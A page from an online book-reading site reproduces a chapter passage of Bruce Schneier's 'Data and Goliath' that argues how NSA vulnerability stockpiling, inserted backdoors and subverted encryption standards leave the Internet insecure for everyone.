Read Data and Goliath Online

Authors: Bruce Schneier

Data and Goliath (22 page)

BOOK: Data and Goliath
13.99Mb size Format: txt, pdf, ePub
ads

Snowden put it like this in an online Q&A in 2013: “Encryption works. Properly implemented
strong crypto systems are one of the few things that you can rely on. Unfortunately,
endpoint security is so terrifically weak that NSA can frequently find ways around
it.”

But those other methods the NSA can use to get at encrypted data demonstrate exactly
why encryption is so important. By leveraging that mathematical imbalance, cryptography
forces an attacker to pursue these other routes. Instead of passively eavesdropping
on a communications channel and collecting data on everyone, the attacker might have
to break into a specific computer system and grab the plaintext. Those routes around
the encryption require more work, more risk of exposure, and more targeting than bulk
collection of unencrypted data does.

Remember the economics of big data: just as it is easier to save everything than to
figure out what to save, it is easier to spy on everyone than to figure out who deserves
to be spied on. Widespread encryption has the potential to render mass surveillance
ineffective and to force eavesdroppers to choose their targets. This would be an enormous
win for privacy, because attackers don’t have the budget to pick everyone.

THE PREVALENCE OF VULNERABILITIES

Vulnerabilities are mistakes. They’re errors in design or implementation—glitches
in the code or hardware—that allow unauthorized intrusion into a system. So, for example,
a cybercriminal might exploit a vulnerability to break into your computer, eavesdrop
on your web connection, and steal the password you use to log in to your bank account.
A government intelligence agency might use a vulnerability to break into the network
of a foreign terrorist organization and disrupt its operations, or to steal a foreign
corporation’s intellectual property. Another government intelligence agency might
take advantage of a vulnerability to eavesdrop on political dissidents, or terrorist
cells, or rival government leaders. And a military might use a vulnerability to launch
a cyberweapon. This is all hacking.

When someone discovers a vulnerability, she can use it either for defense or for offense.
Defense means alerting the vendor and getting it patched—and publishing it so the
community can learn from it. Lots of vulnerabilities are discovered by vendors themselves
and patched without any fanfare. Others are discovered by researchers and ethical
hackers.

Offense involves using the vulnerability to attack others. Unpublished vulnerabilities
are called “zero-day” vulnerabilities; they’re very valuable to attackers because
no one is protected against them, and they can be used worldwide with impunity. Eventually
the affected software’s vendor finds out—the timing depends on how widely the vulnerability
is exploited—and issues a patch to close it.

If an offensive military cyber unit or a cyberweapons manufacturer discovers the vulnerability,
it will keep it secret for future use to build a cyberweapon. If used rarely and stealthily,
the vulnerability might remain secret for a long time. If unused, it will remain secret
until someone else discovers it.

Discoverers can sell vulnerabilities. There’s a robust market in zero-days for attack
purposes—both governments and cyberweapons manufacturers that sell to governments
are buyers—and black markets where discoverers can sell to criminals. Some vendors
offer bounties for vulnerabilities to spur defense research, but the rewards are much
lower.

Undiscovered zero-day vulnerabilities are common. Every piece of
commercial software—your smartphone, your computer, the embedded systems that run
nuclear power plants—has hundreds if not thousands of vulnerabilities, most of them
undiscovered. The science and engineering of programming just isn’t good enough to
produce flawless software, and that isn’t going to change anytime soon. The economics
of software development prioritize features and speed to market, not security.

What all this means is that the threat of hacking isn’t going away. For the foreseeable
future, it will always be possible for a sufficiently skilled attacker to find a vulnerability
in a defender’s system. This will be true for militaries building cyberweapons, intelligence
agencies trying to break into systems in order to eavesdrop, and criminals of all
kinds.

MAINTAINING AN INSECURE INTERNET

In Chapter 6, I discussed how the NSA uses both existing and specially created vulnerabilities
to hack into systems. Its actions put surveillance ahead of security, and end up making
us all less secure. Here’s how the NSA and GCHQ think, according to a
Guardian
article on some of the Snowden documents: “Classified briefings between the agencies
celebrate their success at ‘defeating network security and privacy. . . .’ ”

Just how do governments go about defeating security and privacy? We know the NSA uses
the following four main practices. Assume that the Russians, Chinese, and various
other countries are using similar methods. And cybercriminals aren’t far behind.

Stockpiling vulnerabilities in commercial software that we use every day, rather than
making sure those security flaws get fixed.
When the NSA discovers (or buys) a vulnerability, it can either alert the vendor
and get a still-secret vulnerability fixed, or it can hold on to it and use it to
eavesdrop on target computer systems. Both tactics support important US policy goals,
but the NSA has to choose which one to pursue in each case.

Right now, the US—both at the NSA and at US Cyber Command—stockpiles zero-day vulnerabilities.
How many it has is unclear. In 2014, the White House tried to clarify the country’s
policy on this in a blog post, but didn’t really explain it. We know that a single
cyberweapon, Stuxnet, used four zero-days. Using up that many for a single cyberattack
implies that the government’s stockpile is in the hundreds.

In congressional testimony, former NSA director Michael Hayden introduced the agency
jargon NOBUS, “nobody but us”—that is, a vulnerability that nobody but us is likely
to find or use. The NSA has a classified process to determine what it should do about
vulnerabilities. The agency claims that it discloses and closes most of the vulnerabilities
it finds, but holds back some—we don’t know how many—that it believes are NOBUSes.

This approach seems to be the appropriate general framework, but it’s impossible to
apply in practice. Many of us in the security field don’t know how to make NOBUS decisions,
and we worry that the government can’t, either.

This stockpiling puts everyone at risk. Unpatched vulnerabilities make us all less
safe, because anyone can independently discover them and use them to attack us. They’re
inherently destabilizing, especially because they are only effective for a limited
time. Even worse, each use runs the risk that others will learn about the vulnerability
and use it for themselves. And they come in families; keeping one secret might mean
that an entire class of vulnerabilities remains undiscovered and unpatched. The US
and other Western countries are highly vulnerable to zero-days, because of our critical
electronic infrastructure, intellectual property, and personal wealth. Countries like
China and Russia are less vulnerable—North Korea much less—so they have considerably
less incentive to get vulnerabilities fixed.

Inserting backdoors into widely used computer hardware and software products
.
Backdoors aren’t new. The security industry has long worried about backdoors left
in software by hackers, and has spent considerable effort trying to find and fix them.
But now we know that the US government is deliberately inserting them into hardware
and software products.

One of the NSA documents disclosed by Snowden describes the “SIGINT Enabling Project,”
one tactic of which is to “insert vulnerabilities into commercial encryption systems,
IT systems, networks, and endpoint communications devices used by targets.” We don’t
know much about this project: how much of it is done with the knowledge and consent
of the manufacturers involved, and how much is done surreptitiously by either employees
secretly working for the government or clandestine manipulation of the company’s master
source code files. We also don’t know how well it has succeeded—the documents don’t
give us a lot of details—but
we know it was funded at $250 million per year. We also don’t know which other countries
do the same things to systems designed by companies under their political control.

We know of a few examples. In Chapter 6, I talked about Microsoft weakening Skype
for the NSA. The NSA also pressured Microsoft to put a backdoor in its BitLocker hard
drive encryption software, although the company seems to have resisted. Presumably
there have been other efforts involving other products; I’ve heard about several unsuccessful
attempts privately.

Deliberately created vulnerabilities are very risky, because there is no way to implement
backdoor access to any system that will ensure that only the government can take advantage
of it. Government-mandated access forces companies to make their products and services
less secure for everyone.

For example, between June 2004 and March 2005 someone wiretapped more than 100 cell
phones belonging to members of the Greek government—the prime minister and the ministers
of defense, foreign affairs, and justice—and other prominent Greek citizens. Swedish
telecommunications provider Ericsson built this wiretapping capability into Vodafone
products, but enabled it only for governments that requested it. Greece wasn’t one
of those governments, but some still-unknown party—a rival political group? organized
crime?—figured out how to surreptitiously turn the feature on.

This wasn’t an isolated incident. Something similar occurred in Italy in 2006. In
2010, Chinese hackers exploited an intercept system Google had put into Gmail to comply
with US government surveillance requests. And in 2012, we learned that every phone
switch sold to the Department of Defense had security vulnerabilities in its surveillance
system; we don’t know whether they were inadvertent or deliberately inserted.

The NSA regularly exploits backdoors built into systems by other countries for other
purposes. For example, it used the wiretap capabilities built in to the Bermuda phone
system to secretly intercept
all
the country’s phone calls. Why does it believe the same thing won’t be done to us?

Undermining encryption algorithms and standards.
Another objective of the SIGINT Enabling Project is to “influence policies, standards
and specifications for commercial public key technologies.” Again, details are
few, but I assume these efforts are more focused on proprietary standards like cell
phone security than on public standards like encryption algorithms. For example, the
NSA influenced the adoption of an encryption algorithm for GSM phones that it can
easily break. The one public example we know of is the NSA’s insertion of a backdoored
random number generator into a common Internet standard, followed by efforts to get
that generator used more widely. The intent was to subvert the encryption that people
use to protect their Internet communications and web browsing, but it wasn’t very
successful.

Hacking the Internet.
In Chapter 5, I talked about the NSA’s TAO group and its hacking mission. Aside from
directly breaking into computers and networking equipment, the NSA masquerades as
Facebook and LinkedIn (and presumably other websites as well) to infiltrate target
computers and redirect Internet traffic to its own dummy sites for eavesdropping purposes.
The UK’s GCHQ can find your private photos on Facebook, artificially increase traffic
to a website, disrupt video from a website, delete computer accounts, hack online
polls, and much more.

In addition to the extreme distrust that all these tactics engender amongst Internet
users, they require the NSA to ensure that surveillance takes precedence over security.
Instead of improving the security of the Internet for everyone’s benefit, the NSA
is ensuring that the Internet remains insecure for the agency’s own convenience.

This hurts us all, because the NSA isn’t the only actor out there that thrives on
insecurity. Other governments and criminals benefit from the subversion of security.
And a surprising number of the secret surveillance technologies revealed by Snowden
aren’t exclusive to the NSA, or even to other national intelligence organizations.
They’re just better-funded hacker tools. Academics have discussed ways to recreate
much of the NSA’s collection and analysis tools with open-source and commercial systems.

For example, when I was working with the
Guardian
on the Snowden documents, the one top-secret program the NSA desperately did not
want us to expose was QUANTUM. This is the NSA’s program for what is called
packet injection—basically, a technology that allows the agency to hack into computers.
Turns out, though, that the NSA was not alone in its use of this technology. The Chinese
government uses packet injection to attack computers. The cyberweapons manufacturer
Hacking Team sells packet injection technology to any government willing to pay for
it. Criminals use it. And there are hacker tools that give the capability to individuals
as well. All of these existed before I wrote about QUANTUM. By using its knowledge
to attack others rather than to build up the Internet’s defenses, the NSA has worked
to ensure that
anyone
can use packet injection to hack into computers.

Even when technologies are developed inside the NSA, they don’t remain exclusive for
long. Today’s top-secret programs become tomorrow’s PhD theses and the next day’s
hacker tools. Techniques first developed for the military cyberweapon Stuxnet have
ended up in criminal malware. The same password-cracking software that Elcomsoft sells
to governments was used by hackers to hack celebrity photos from iCloud accounts.
And once-secret techniques to monitor people’s cell phones are now in common use.

BOOK: Data and Goliath
13.99Mb size Format: txt, pdf, ePub
ads

Other books

Between the Cracks by Helena Hunting
Come Endless Darkness by Gary Gygax
Human Remains by Elizabeth Haynes
The Anatomy of Jane by Amelia Lefay
Divided by Brooks, Rae
Between the Spark and the Burn by April Genevieve Tucholke
GoingUp by Lena Matthews